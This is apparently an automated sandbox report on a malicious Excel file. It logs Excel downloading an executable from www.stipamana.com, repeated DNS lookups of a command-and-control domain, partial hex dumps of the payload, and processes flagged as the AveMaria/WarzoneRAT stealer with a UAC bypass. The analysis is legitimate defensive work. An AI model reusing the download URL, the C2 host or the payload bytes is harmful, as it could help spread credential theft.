Dec 12, 2024 21:52:10.325464010 CET | 8.8.8.8 | 192.168.2.22 | 0xc0c0 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:17.743431091 CET | 8.8.8.8 | 192.168.2.22 | 0xbd2c | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:25.159442902 CET | 8.8.8.8 | 192.168.2.22 | 0x53a8 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:32.566340923 CET | 8.8.8.8 | 192.168.2.22 | 0xc1b9 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:39.997255087 CET | 8.8.8.8 | 192.168.2.22 | 0x22d1 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:47.366159916 CET | 8.8.8.8 | 192.168.2.22 | 0x8a16 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:54.755981922 CET | 8.8.8.8 | 192.168.2.22 | 0x4a7 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:02.137824059 CET | 8.8.8.8 | 192.168.2.22 | 0x6f88 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:09.553461075 CET | 8.8.8.8 | 192.168.2.22 | 0xab6c | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:16.934592009 CET | 8.8.8.8 | 192.168.2.22 | 0xfc60 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:24.387618065 CET | 8.8.8.8 | 192.168.2.22 | 0x9b0b | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:31.802103043 CET | 8.8.8.8 | 192.168.2.22 | 0x4a3f | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:39.215998888 CET | 8.8.8.8 | 192.168.2.22 | 0x6282 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:46.659801006 CET | 8.8.8.8 | 192.168.2.22 | 0x2d | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:54.049069881 CET | 8.8.8.8 | 192.168.2.22 | 0xbaca | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:01.466228962 CET | 8.8.8.8 | 192.168.2.22 | 0x1eee | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:08.888257027 CET | 8.8.8.8 | 192.168.2.22 | 0x58e8 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:24.724996090 CET | 8.8.8.8 | 192.168.2.22 | 0xde9b | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:32.145724058 CET | 8.8.8.8 | 192.168.2.22 | 0xfcaa | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:39.544877052 CET | 8.8.8.8 | 192.168.2.22 | 0x846c | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:46.940597057 CET | 8.8.8.8 | 192.168.2.22 | 0xcd61 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
                                              • www.stipamana.com
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.224916394.156.167.554433316C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-12-12 20:45:43 UTC | 477 | OUT | GET /sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: www.stipamana.com
                                              Connection: Keep-Alive
2024-12-12 20:45:44 UTC | 320 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 12 Dec 2024 20:45:43 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 283648
                                              Last-Modified: Thu, 12 Dec 2024 19:13:08 GMT
                                              Connection: close
                                              ETag: "675b35c4-45400"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              Accept-Ranges: bytes
                                              2024-12-12 20:45:44 UTC16064INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c4 35 5b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 42 04 00 00 10 00 00 00 00 00 00 4e 60 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 04 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5[gBN` @ `
                                              2024-12-12 20:45:44 UTC16384INData Raw: e8 08 29 83 f1 2b bc 91 ca 2b 02 71 9c 72 08 a9 2b 32 e0 77 39 41 f4 06 43 90 25 ef 08 ae db 32 2f 61 ba fa 9e b3 8d 49 e7 40 13 04 69 3f fa 52 2d fc c0 7d 5e e8 a3 47 31 80 18 1e 16 68 ef e4 70 ad 16 f9 49 b8 51 71 b5 07 f1 e3 a2 ad 6e f2 ad ba 53 2d e6 81 a1 77 10 ff 12 2a 5b 4f 33 73 2c b0 86 28 02 2f 33 44 c2 39 37 84 d6 b9 48 39 f2 8b f6 31 54 0d e3 b7 3e 02 a9 8d c3 e3 05 4e 73 8c e8 ee 77 55 c5 a2 45 e2 87 a7 25 b2 8a fe b0 18 4d 9c 75 2a 7e c7 ec 0e 25 cf 8d 12 16 67 20 76 9c 4d c4 0c 0d 5a 91 74 96 a7 00 4d 32 2e 57 56 a8 47 02 44 43 7e 28 45 8f f1 f5 19 65 a5 9f d4 3e e5 57 e8 19 41 16 1e d5 96 08 49 cb 13 3f f5 d1 31 9d ee 0d 5e 87 ba bb 79 bd a2 e6 e1 e9 b1 3b 2d df e8 e2 cf 9b cb 68 f0 d3 a9 bc 9e 4b 54 1b 7c 73 5a ed 76 8b c7 17 96 5e e8 3d
                                              Data Ascii: )++qr+2w9AC%2/aI@i?R-}^G1hpIQqnS-w*[O3s,(/3D97H91T>NswUE%Mu*~%g vMZtM2.WVGDC~(Ee>WAI?1^y;-hKT|sZv^=
                                              2024-12-12 20:45:44 UTC16384INData Raw: 79 78 d3 73 88 dd 0d 0f b7 90 d4 10 43 3b 21 66 0a 3d 51 60 fe 7a 65 65 73 25 b3 c3 a1 e1 89 4b a1 4e d6 74 4d 15 54 a7 41 cf d8 5a 24 e4 81 a6 54 c7 e9 ef 36 ae c7 b3 e8 7a eb 33 d6 69 91 c9 a4 80 9e 3c d5 37 fd 60 c9 5c cc 7f ea 48 35 60 4b af 22 85 bd a6 7c 5c 7c 32 0c 6c d4 23 82 3f 43 b8 bc 3e 17 ce 09 32 f3 89 1a c5 3a 2e d6 f9 5c 7c a4 71 da 2f 6a 84 df 79 14 fc 69 89 65 a0 7e 7a e1 91 8c 7f 77 c8 a0 4d 0a ab 3c 75 ec b2 fd 84 c1 3d 6d 9a 30 40 4b 86 02 e2 29 9d 51 35 7b 64 e8 6c e5 1e bf 10 c2 fa e9 9c aa 48 db 62 81 cf d8 42 20 41 10 53 b9 97 87 db d7 7a a4 58 8e b2 66 f9 47 69 58 46 e5 57 71 6a cd d2 d7 fc 30 48 ee 74 93 de e5 d7 89 59 61 c7 5a 1c 7a 93 5e e0 13 e4 8f 9c 4c 19 89 16 f0 24 3b 7d e4 10 24 7f 5c 23 57 ae 10 68 a1 cc d4 36 19 43 26
                                              Data Ascii: yxsC;!f=Q`zees%KNtMTAZ$T6z3i<7`\H5`K"|\|2l#?C>2:.\|q/jyie~zwM<u=m0@K)Q5{dlHbB ASzXfGiXFWqj0HtYaZz^L$;}$\#Wh6C&
                                              2024-12-12 20:45:44 UTC16384INData Raw: e8 5b ab 9d 05 37 cd 06 66 4a 1e b6 34 e4 3a 29 48 a8 f2 e8 33 73 c0 bb c2 3c 08 59 2e f9 58 d3 23 e8 12 36 35 2a e4 96 67 5f 38 78 43 3d d2 58 c7 b1 14 cd d6 b7 4d bb e3 c1 9b f7 a6 94 62 c0 df b9 ad 9c 36 14 f0 fa 88 ac 08 16 01 5a 72 15 87 c6 a6 bb 06 cc 7e 3b 50 b3 14 74 32 0e f6 48 f4 cd 76 4c 73 f8 e3 b4 7a 4b 3c 34 b1 a6 3b 7f e5 21 62 39 9f 5e 8c b4 7c 50 2a 9b 5e 82 14 f6 f0 10 f0 59 29 26 d5 a8 3e 9f 93 57 86 c5 66 ce f4 2a 57 f3 e3 35 c4 16 01 53 88 f7 7b 67 b5 76 56 25 aa 04 49 d7 75 29 c8 8c b0 d2 4f 21 83 2f 06 54 32 a8 fb 0c 04 c9 9f 44 e0 4b aa ea cd ca 6f c0 28 4e 8a a4 26 48 25 c5 ce cf 79 a5 a2 f6 04 a9 42 48 04 ef fe 3a 11 fd 3f 0a da 42 9d 55 66 dd e7 dc 16 ba bd 17 2a 1d a3 88 2e 4f 01 71 55 93 d6 f6 bf ed 02 e8 e3 e4 91 39 0a f0 18
                                              Data Ascii: [7fJ4:)H3s<Y.X#65*g_8xC=XMb6Zr~;Pt2HvLszK<4;!b9^|P*^Y)&>Wf*W5S{gvV%Iu)O!/T2DKo(N&H%yBH:?BUf*.OqU9
                                              2024-12-12 20:45:44 UTC16384INData Raw: 0f 81 3f 05 0c e9 a4 92 b1 3e c7 93 6c 88 b3 09 bc 5f 73 25 c2 b8 d2 de 31 3e 95 31 0c 23 8f 2f 82 c2 ae 88 76 bf 5f 14 3b 89 e0 28 4f 20 a8 da c3 88 04 a6 da 97 4d ed 03 d4 14 32 7e db ad 34 f2 65 e3 3e 73 1c b6 37 b2 6d 69 30 a7 8d 54 97 b2 87 53 a2 0b 5d 58 d3 73 fb b9 2f 0c 1a d0 ef 60 7e f2 c6 f4 55 ad df 3a c1 bb 08 26 5f 99 f9 7a 8b 16 49 bb 12 b1 41 1b 4b f9 76 df 6a f8 b6 b6 7d 18 5c 82 88 15 cd 1c 7f 58 38 07 f5 30 ed 6d ac 93 db 17 7e e6 71 32 4a 10 de bf fa 65 81 92 28 9d cf 2b 06 a6 d3 e4 b6 da f5 0e 08 1b d8 47 ce ef db dd 0a cb b6 ee 26 4f e7 e3 b3 82 88 1e e7 45 82 bf a2 22 93 20 d0 ca 90 9d 87 fa 3c b0 ad 2b fb 08 44 75 dd 4a fe 65 ba 7e 4c 1a 8e 15 b1 33 14 d5 28 6a bc 08 18 65 90 e9 be 11 0a 3e d3 5b 0b 49 4c 31 45 b0 45 e1 6f 92 2b 2f
                                              Data Ascii: ?>l_s%1>1#/v_;(O M2~4e>s7mi0TS]Xs/`~U:&_zIAKvj}\X80m~q2Je(+G&OE" <+DuJe~L3(je>[IL1EEo+/
                                              2024-12-12 20:45:44 UTC16384INData Raw: d0 28 2b ef ef 80 d6 b5 7c 6e 61 31 c7 4e d6 2d ea fc d1 40 16 18 f8 c0 39 20 cb 3e ea 13 9a 7e 75 97 d6 b5 21 09 13 40 cb 72 8c 47 7f ec b6 a1 6e 0d cf 9e 63 ea 33 6a 2d f5 b3 08 a8 c3 9e 92 a8 d1 11 7e 23 c2 43 06 0b cb af e2 6e 79 93 cf ac 8e e1 07 11 55 f1 a6 38 85 14 95 21 b4 b6 d2 99 87 53 3d 53 33 7d c0 03 59 93 84 52 3c ee 0e 7b fe 97 6b c4 61 a0 cf 74 e6 7f 3c 8e 70 25 5b 53 28 fb 78 d7 a9 03 2b f0 b8 22 fe ff a6 97 16 0d 25 1a dc a2 41 a9 95 af 65 6d b8 86 b1 c7 20 8a a3 d0 aa ba fe 2e 8c 14 9f 0e 51 d8 b4 56 67 a9 a1 b6 09 7b 15 eb 45 48 7e b4 2b 5e 29 a5 7f 7f 9f d0 1a 90 09 31 76 aa 60 bc 9e 7e e5 65 75 1d f5 72 b2 b9 da bc 61 06 c9 b8 6f 29 6e 78 aa 33 ef 14 12 75 8a 51 7e c6 4f 06 36 8d 7f 6c e2 3e 75 ea 72 1e ef 0a 06 1e 7c 51 41 90 45 c2
                                              Data Ascii: (+|na1N-@9 >~u!@rGnc3j-~#CnyU8!S=S3}YR<{kat<p%[S(x+"%Aem .QVg{EH~+^)1v`~eurao)nx3uQ~O6l>ur|QAE
                                              2024-12-12 20:45:44 UTC16384INData Raw: f3 f9 a9 f9 77 35 6d 4e 45 9a e6 76 db 04 e4 83 8c af e2 0e 84 5c 54 55 c4 d0 c0 c5 72 56 37 bb 88 87 39 de 21 f4 81 00 f7 3d e5 5b 07 4b 27 06 e0 69 ab 5a a9 15 0b 9d 24 38 52 34 12 96 91 79 1e 6b 5e 89 b2 f1 18 94 90 b0 4e d9 6d 15 b0 75 5f c0 55 f1 87 aa c7 d0 5c 0e b3 04 91 a6 44 cd 3f 05 06 20 21 2c 14 7e 1f 72 e4 55 fe f9 44 ad b7 38 ca 3e 89 49 c7 12 92 6f 1e 3b 73 b7 1b 7d 55 6d d6 49 28 1b dc 7a 55 51 45 b3 39 a7 f4 01 3b 51 eb de f2 27 4b 23 f1 16 a4 84 ea bc 15 4b d0 42 6a 29 1b 5a 94 32 1c 92 3b 22 fa 24 11 b6 06 2f 9c 29 34 f8 48 83 c6 0c 07 88 e4 4d cb 41 ab 0d ab 18 3e 9c 37 9e a4 7b 97 ca c8 c3 24 09 d8 f0 15 92 6f 9d 5c 84 5b 4f 81 ac 76 45 30 d1 59 62 9b 27 6b 3c fd 3e e2 80 3f 13 2d 7b 29 1d cc 0b 4c a6 76 1a 6d 7f 5e cd b9 1e 1f ad a8
                                              Data Ascii: w5mNEv\TUrV79!=[K'iZ$8R4yk^Nmu_U\D? !,~rUD8>Io;s}UmI(zUQE9;Q'K#KBj)Z2;"$/)4HMA>7{$o\[OvE0Yb'k<>?-{)Lvm^
                                              2024-12-12 20:45:44 UTC16384INData Raw: cc 19 92 28 da 44 ce 2a 22 0b ec 77 40 8d 02 cf 13 13 6f 96 d0 15 5f f2 9f 7f b2 39 c3 c9 9b 0a c6 02 4a 7f c5 87 a3 5d 14 0a bd 30 f8 cc b7 01 c4 05 da 52 b7 bc 18 bb da c6 fa 7d 4c bd f1 b4 23 a0 54 85 91 19 f0 01 4a ff c3 6d 93 b8 a5 e4 cd 6c 3a d1 fe c0 a9 a7 36 a8 5c 5d 28 32 58 81 11 2c 1b a0 27 29 13 b4 f3 0a 16 46 59 b4 00 e6 21 ff 56 2b 30 d6 30 e2 86 3d 8d 35 30 e8 38 13 e0 5b 2e 8c 40 e2 28 e8 eb 3f 1f 2d a7 c3 f6 ca 55 34 ce c9 af 3f e6 3b 13 d2 b9 45 e6 f1 26 75 fa 34 d0 d5 3a 1c 20 5e 59 34 fa 73 a5 34 89 8c 99 5d 2c 0b 99 5a 13 53 55 06 1d 9b bf 39 ee 46 8d 9f f9 7e af 6c fb 61 d0 3d 40 9f b7 bb 64 a5 03 ff 6a 9a a5 1a a2 1f 28 74 b4 1b 5f 21 b8 91 7f 58 92 e3 d9 4b 91 11 8e ba 3d 75 62 45 dc a6 08 c4 b6 5e 07 3f d6 d5 78 7c 52 17 87 2f 24
                                              Data Ascii: (D*"w@o_9J]0R}L#TJml:6\](2X,')FY!V+00=508[.@(?-U4?;E&u4: ^Y4s4],ZSU9F~la=@dj(t_!XK=ubE^?x|R/$
                                              2024-12-12 20:45:44 UTC16384INData Raw: e3 fd 92 0c c9 41 29 59 f5 fa d7 72 f2 75 be 0a 19 b5 eb a2 96 03 f9 6a 31 cc e9 52 25 59 54 52 5a b3 64 b6 c2 f3 9b 9f 48 10 ab 83 21 a6 7a ce 66 18 3e be 4c fc 32 31 0a e4 37 a7 be 59 e6 2d 20 60 eb a8 dd 13 66 cb 01 3c f3 86 82 9d 2e 30 4c 07 83 39 bd e3 fb df 17 86 ca 95 67 61 32 7c d7 89 4b b8 aa a7 e6 d0 ea 59 e2 22 29 66 e8 cc 26 ab 3b 20 a6 58 0d d9 5c fa 79 af cf 1d fb c7 c5 d7 08 5f 17 f1 b5 18 de a3 55 ea c7 53 9d b0 24 22 7f ff 68 c3 80 37 9c fc 8f b8 04 9d 05 dc 98 6a 73 c3 1a 44 49 cf f9 ff 04 65 b2 9f db 5b 57 81 fe 6f a6 9e 9d 40 e0 d4 22 03 98 c2 7b 18 e0 68 25 f6 3a 9c 32 95 75 a2 99 39 ba fd de b6 8a 9f 0b e3 1f 22 cc 65 4b fc 01 bc 2b 3a a9 52 15 b0 7d 70 16 25 7f a0 49 58 78 71 d2 b9 58 71 e6 d5 ba a0 a3 18 d3 4f d5 f4 6f dd 9a 24 0a
                                              Data Ascii: A)Yruj1R%YTRZdH!zf>L217Y- `f<.0L9ga2|KY")f&; X\y_US$"h7jsDIe[Wo@"{h%:2u9"eK+:R}p%IXxqXqOo$
                                              2024-12-12 20:45:44 UTC16384INData Raw: ac cb 06 6b 01 ce c9 4e e4 47 a6 ba 82 9a dc dc 21 1a 60 c4 7b 03 ad 44 30 3c 65 be 20 f6 79 28 eb ec 8f 4e 77 a1 32 67 e0 ed 9c ca b0 26 b8 d2 c7 5d d0 19 e5 9b ef 95 a9 7a 38 69 f4 da 1c f1 72 f0 5e 60 01 f7 85 79 17 9c 48 65 e9 f0 a9 0b ba d4 24 ba 83 c9 d8 f4 f3 ff fd ef 68 1c 3f 3a c7 a9 87 38 20 c7 68 55 6a e4 b1 8c d1 c3 3a 1f 2b 2f cb 0d 66 1d 6a e4 0d 4c 9a 62 a0 cc a7 b3 1f 53 d2 5d ba eb 16 9d e5 a3 f8 1a b9 7e 5f c2 42 51 a6 22 56 5f e0 d5 f6 64 ef c0 ab 11 38 30 2d de f3 2f e2 80 c9 46 1d 53 fe 23 c4 84 4b fe 5f 0e 40 79 79 d5 6b ad 31 da c3 00 15 19 bc 8c d5 bd 73 48 b9 2d 8b 89 a5 92 cd a4 01 97 4a 02 1d b9 e4 63 65 16 91 fc 2f 3c 8d 36 b5 95 16 76 37 1e d4 21 cf 47 cb 77 92 01 e5 88 29 cd 19 82 38 da 97 f7 e8 04 fc c5 23 08 7a 67 fe 55 77
                                              Data Ascii: kNG!`{D0<e y(Nw2g&]z8ir^`yHe$h?:8 hUj:+/fjLbS]~_BQ"V_d80-/FS#K_@yyk1sH-Jce/<6v7!Gw)8#zgUw


                                              Target ID:0
                                              Start time:15:45:36
                                              Start date:12/12/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13fb10000
                                              File size:28'253'536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:4
                                              Start time:15:45:43
                                              Start date:12/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe"
                                              Imagebase:0xb70000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:15:45:44
                                              Start date:12/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Imagebase:0xb70000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:6
                                              Start time:15:45:44
                                              Start date:12/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Imagebase:0xb70000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000006.00000002.374015317.000000000054F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: AveMaria_WarZone, Description: unknown, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              Target ID:11
                                              Start time:15:45:46
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\ProgramData\msimages.exe"
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:12
                                              Start time:15:45:47
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\ProgramData\msimages.exe
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:13
                                              Start time:15:45:47
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\ProgramData\msimages.exe
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:14
                                              Start time:15:45:58
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\ProgramData\msimages.exe"
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
